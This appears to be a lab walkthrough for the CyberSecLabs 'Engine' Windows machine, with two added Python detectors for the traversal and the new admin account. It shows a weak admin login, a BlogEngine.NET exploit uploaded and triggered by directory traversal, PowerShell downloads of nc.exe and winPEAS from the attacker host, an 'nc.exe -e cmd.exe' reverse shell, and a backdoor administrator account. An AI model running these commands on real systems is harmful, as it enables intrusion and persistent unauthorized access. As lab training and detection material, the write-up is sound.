CyberSecLabs "ENGINE" Walkthrough - No Metasploit Version


Engine, a new Windows-oriented machine from CyberSecLabs, is a neat test of your ability to think simply while using some of the tools we have covered in previous walkthroughs.  There are a few different paths to completing this challenge; I will be showcasing a method that doesn't use Metasploit and that uses Evil-WinRM rather than psexec or another tool.  So let's dig right in!

Scanning

As always, we need to understand our target before we start poking at it.  Let's kick things off with a basic Nmap scan, followed by an -A scan (OS detection, version detection and default scripts).

nmap 172.31.1.16

nmap -A 172.31.1.16

As you can see, we have a web server running on port 80, SMB on 445, and RDP on 3389.  Note the machine's name, ENGINE, for later reference.  Let's continue on.

Enumeration

We start by checking out the web server on port 80, but we only get a default page.

Default Windows IIS Webpage

This is a common occurrence in a penetration test: a server that shows a default page can still be hosting applications in subdirectories.  We can check for this using Dirsearch.
python3 dirsearch.py -u 172.31.1.16 -e php,cgi,txt,exe,html -x 400,401,403 -r -R 3

Dirsearch has located additional directories, in this case specifically the /blog directory.  Let's check that out in the browser now and see what we find.
172.31.1.16/blog

We can see a page named "Alex's Blog," which appears to be running BlogEngine.NET.  Additionally, we can attempt to log in by clicking the login button in the submenu above.

BlogEngine login page for Alex's Blog

I attempted to use default credentials I found online, but they were unsuccessful.  However, trying the tried and true "admin:admin" worked, and we successfully gained access to the administrator dashboard.  Let's go back to the BlogEngine service we discovered earlier, and do some research.  Searchsploit shows the following results.

searchsploit blogengine

BlogEngine appears to be vulnerable to directory traversal and remote code execution.  Let's do some research and see if one of these exploits can help us gain access.  After some searching, we find that one of them (46353.cs) seems to fit our needs.

ExploitDB BlogEngine.NET 3.3.6 Exploit

Exploitation

Now that we have a possible exploit, we need to figure out how to use it.  Fortunately this one is pretty straightforward.  We can copy it from the ExploitDB folder on Kali to our working directory and inspect its requirements.

Copying 46353.cs from ExploitDB directory to our working directory

Information Modification

There are a couple of things to note here.  First, at the bottom of the file we have to modify the IP address and port to match our listener.  At the top we are instructed to save the file as "PostView.ascx", since that is the file name the BlogEngine service will recognize.  Modify as required and save the file.  Once you've done this we can move ahead.
Now navigate through the dashboard to the edit menu for the single post we can locate on the server.

Choose the post above

Click the File Manager button as shown above

From here you should see an upload button.  Select that, and upload your "PostView.ascx" file.
Uploading file

Now that the file is uploaded, we need to browse to the URL shown in the exploit file.  But first, start a Netcat listener on the port we specified in the exploit.  If you've followed the instructions correctly, you should get a reverse shell when you visit that URL.
Reverse Shell - http://172.31.1.16/blog/?theme=../../App_Data/files
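From the defender's side, the request above leaves a clear trace in the IIS logs.  The following detector is an added example, not part of the original walkthrough or of the BlogEngine project: it parses a constructed IIS W3C log excerpt and flags any query parameter whose fully URL-decoded value contains a ".." path segment, tagging the BlogEngine theme parameter specifically.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not from the lab); the parser reads the
# "#Fields:" header, so column order is not hard-coded. Line 4 is line 3 double-URL-encoded.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2020-05-01 10:00:01 172.31.1.16 GET /blog/ theme=Standard 80 10.10.0.7 Mozilla/5.0 200
2020-05-01 10:00:07 172.31.1.16 GET /blog/ - 80 10.10.0.7 Mozilla/5.0 200
2020-05-01 10:02:13 172.31.1.16 GET /blog/ theme=../../App_Data/files 80 10.10.0.7 Mozilla/5.0 200
2020-05-01 10:02:40 172.31.1.16 GET /blog/ theme=%252e%252e%252f%252e%252e%252fApp_Data%252ffiles 80 10.10.0.7 curl/7.68.0 200
2020-05-01 10:03:01 172.31.1.16 GET /blog/post.aspx id=12%2e%2e 80 10.10.0.7 Mozilla/5.0 404
"""

# ".." only counts when it is a whole path segment ("12.." is not a traversal).
DOTDOT_SEGMENT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split(" ")
            if fields and len(values) == len(fields):  # skip malformed lines, never guess
                yield dict(zip(fields, values))

def decode_fully(value, rounds=3):
    """URL-decode until stable so %2e%2e and %252e%252e both normalise to '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal(text):
    """One finding per query parameter whose decoded value holds a '..' segment."""
    findings = []
    for rec in parse_w3c(text):
        for pair in rec.get("cs-uri-query", "-").split("&"):  # IIS logs "-" for no query
            name, _, raw = pair.partition("=")
            value = decode_fully(raw)
            if DOTDOT_SEGMENT.search(value):
                findings.append({"time": f"{rec['date']} {rec['time']}", "client": rec["c-ip"],
                                 "param": name, "value": value, "status": rec["sc-status"],
                                 "rule": "blogengine-theme-traversal" if name == "theme" else "generic-traversal"})
    return findings
```

A 200 status on a flagged theme request means the traversal was served, which is the signal to check App_Data/files for unexpected .ascx uploads.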

You'll notice that the shell is a bit unstable and would benefit from an upgrade.  I do this by using PowerShell on the target to download my Netcat binary from the Kali machine.  Remember to start your Python SimpleHTTPServer first.

Bottom - python -m SimpleHTTPServer 8181; Top - powershell -c wget "http://10.10.0.7:8181/nc.exe" -outfile "nc.exe"

You can now start another Netcat listener on Kali and run nc.exe from the target machine to connect back.  Let's do that now.
Bottom - nc -nlvp 5555; Top - nc.exe 10.10.0.7 5555 -e cmd.exe

Great!  We now have a more stable shell.  Unfortunately, we quickly find that we do not have access to the user or Administrator folders, so we will need to escalate privileges.
User folder access denied

We can use various methods to find ways to escalate.  In this case I used winPEAS.  Let's grab that from the Tools folder on our Kali machine and run it.
powershell -c wget "http://10.10.0.7:8181/winPEAS.exe" -outfile "winPEAS.exe"; winpeas.exe

We let winPEAS do its thing, and once it's complete we can go through the results.  One thing sticks out: some default credentials have been found hiding in the registry.
Default Credentials Found

Now that we have what appear to be Administrator credentials, we can attempt to log in with them.  Since we found SMB running on the machine earlier, psexec is an option; in the case of this walkthrough, we use Evil-WinRM.
evil-winrm -i 172.31.1.16 -u administrator -p PzCEKhvj6gQMk7kA -s /root/Desktop/Tools

You'll notice that whoami returns administrator, which is what we hoped for.  Additionally, note my use of the -s flag with the directory that follows it.  This allows you to run scripts and programs directly from the Tools directory on your Kali machine.  Neat trick!  Let's grab our flags quickly.

access.txt and system.txt flags found

If you're here for just the flags, then congratulations!  You have completed the challenge and can submit the hashes to the CSL dashboard for the machine.  If you are interested in some basic post-exploitation, please continue on.

Post Exploitation

Now that we have administrative access, we can think about how to maintain access in the future.  As in previous guides, we can simply create a user and add it to the Administrators group.

net user themayor !Password!123 /add; net localgroup Administrators themayor /add

We saw earlier that RDP is already enabled, so we don't need to enable it and can simply attempt to log in using xfreerdp.

xfreerdp /u:themayor /p:'!Password!123' /v:172.31.1.16

And we are successfully in the Server 2012 environment.  Open up Server Manager quickly to verify that we are in the Administrators group and you're all set.  Make sure you contact the client, if required by the rules of engagement, and let them know you have compromised the server.
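The persistence step above (net user /add followed by net localgroup Administrators /add) shows up in the Windows Security log as event 4720 followed by 4732.  As an added example that is not part of the original post, this Python snippet correlates constructed events of that shape and rates the result; the flat event fields are my assumption about how a SIEM might export them.

```python
from datetime import datetime, timedelta

# Constructed Security-log events in a flat SIEM-style shape (an assumption, not a
# Windows export format). Event 4720 carries the new account's SID; 4732 names the
# member by SID only, so the SID is the join key, not the user name.
SAMPLE_EVENTS = [
    {"time": "2020-05-01T10:15:02", "id": 4720, "subject": "Administrator",
     "target_user": "themayor", "target_sid": "S-1-5-21-1-2-3-1010"},
    {"time": "2020-05-01T10:15:03", "id": 4732, "subject": "Administrator",
     "group": "Administrators", "member_sid": "S-1-5-21-1-2-3-1010"},
    {"time": "2020-05-01T11:00:00", "id": 4720, "subject": "Administrator",
     "target_user": "svc_backup", "target_sid": "S-1-5-21-1-2-3-1011"},
    {"time": "2020-05-01T11:00:30", "id": 4732, "subject": "Administrator",
     "group": "Remote Desktop Users", "member_sid": "S-1-5-21-1-2-3-1011"},
    {"time": "2020-05-02T09:00:00", "id": 4732, "subject": "Administrator",
     "group": "Administrators", "member_sid": "S-1-5-21-1-2-3-1004"},
]

def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")

def correlate_admin_persistence(events, window=timedelta(minutes=10)):
    """Return alerts: 'high' when an account is created (4720) and added to
    Administrators (4732) within `window`; 'medium' for any other Administrators add.
    Adds to other groups are ignored here, although 4732 is always worth keeping."""
    created = {}  # SID -> the 4720 event that created the account
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO stamps sort correctly as text
        if ev["id"] == 4720:
            created[ev["target_sid"]] = ev
        elif ev["id"] == 4732 and ev["group"].lower() == "administrators":
            origin = created.get(ev["member_sid"])
            if origin and parse_time(ev["time"]) - parse_time(origin["time"]) <= window:
                alerts.append({"severity": "high", "user": origin["target_user"],
                               "sid": ev["member_sid"], "by": ev["subject"], "time": ev["time"]})
            else:
                alerts.append({"severity": "medium", "user": None,
                               "sid": ev["member_sid"], "by": ev["subject"], "time": ev["time"]})
    return alerts
```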

Final Thoughts

Engine is a really neat challenge that required us to exploit a common weak-password vulnerability, and it showed us the potential issues surrounding passwords being stored on the machine where easy-to-use tools can find them.  I hope this challenge has helped you (it's definitely helped me) and I will see you next time!


